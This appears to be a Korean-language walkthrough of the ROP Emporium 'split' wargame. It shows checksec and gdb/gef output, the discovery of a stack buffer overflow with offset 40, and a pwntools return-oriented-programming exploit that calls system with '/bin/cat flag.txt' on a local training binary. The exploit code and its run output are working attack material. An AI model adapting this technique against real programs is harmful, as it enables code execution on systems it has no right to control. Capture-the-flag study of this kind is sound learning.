보호 기법
gef➤ checksec
[+] checksec for '/home/kali/wargame/ROP/split/split'
[*] gef.py:L8789 'checksec' is deprecated and will be removed in a feature release. Use Elf(fname).checksec()
Canary : ✘
NX : ✓
PIE : ✘
Fortify : ✘
RelRO : Partial
코드 분석
gef➤ disas pwnme
Dump of assembler code for function pwnme:
0x000000000040071f <+55>: lea rax,[rbp-0x20] // rax = rbp-0x20
0x0000000000400723 <+59>: mov edx,0x60 // edx = 0x60
0x0000000000400728 <+64>: mov rsi,rax // rsi = rbp-0x20
0x000000000040072b <+67>: mov edi,0x0 // edi = 0x0
0x0000000000400730 <+72>: call 0x400590 <read@plt> // read(0, rbp-0x20, 0x60)
End of assembler dump.
gef➤ disas usefulFunction
Dump of assembler code for function usefulFunction:
0x0000000000400742 <+0>: push rbp
0x0000000000400743 <+1>: mov rbp,rsp
0x0000000000400746 <+4>: mov edi,0x40084a
0x000000000040074b <+9>: call 0x400560 <system@plt>
0x0000000000400750 <+14>: nop
0x0000000000400751 <+15>: pop rbp
0x0000000000400752 <+16>: ret
End of assembler dump.
gef➤ x/s 0x40084a
0x40084a: "/bin/ls"
gef➤ grep /bin/cat
[+] Searching '/bin/cat' in memory
[+] In '/home/kali/wargame/ROP/split/split'(0x601000-0x602000), permission=rw-
0x601060 - 0x601071 → "/bin/cat flag.txt"
- read(0, rbp-0x20, 0x60)에서 버퍼 오버플로우 발생
- system 함수가 사용되었기 때문에 system 함수 주소의 plt와 got 값을 구할 수 있음
- /bin/cat flag.txt 문자열이 바이너리 내에 존재합니다.
Offset 찾기
gef➤ pattern create 0x100
[+] Generating a pattern of 256 bytes (n=8)
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaab
[+] Saved as '$_gef0'
gef➤ r
Starting program: /home/kali/wargame/ROP/split/split
[*] Failed to find objfile or not a valid file format: [Errno 2] No such file or directory: 'system-supplied DSO at 0x7ffff7fca000'
split by ROP Emporium
x86_64
Contriving a reason to ask user for data...
> aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaab
Thank you!
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400741 in pwnme ()
gef➤ x/gx $rsp
0x7fffffffdf08: 0x6161616161616166
gef➤ pattern search 0x6161616161616166
[+] Searching for '6661616161616161'/'6161616161616166' with period=8
[+] Found at offset 40 (little-endian search) likely
익스플로잇 코드
from pwn import *
def slog(name, addr):
return success(": ".join([name, hex(addr)]))
p = process("./split")
e = ELF("./split")
libc = e.libc
r = ROP(e)
system_plt = e.plt['system']
pop_rdi = r.find_gadget(['pop rdi', 'ret'])[0]
flag = 0x601060
payload = b'A' * 40
payload += p64(pop_rdi) + p64(flag)
payload += p64(system_plt)
p.sendlineafter("> ", payload)
p.recvuntil("Thank you!")
p.interactive()
익스플로잇
kali@kali ~/wargame/ROP/split python3 exploit.py
[+] Starting local process './split': pid 2746
[*] '/home/kali/wargame/ROP/split/split'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] '/usr/lib/x86_64-linux-gnu/libc-2.33.so'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loaded 14 cached gadgets for './split'
/home/kali/.local/lib/python3.10/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/
res = self.recvuntil(delim, timeout=timeout)
/home/kali/wargame/ROP/split/exploit.py:25: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/
p.recvuntil("Thank you!")
[*] Switching to interactive mode
ROPE{a_placeholder_32byte_flag!}
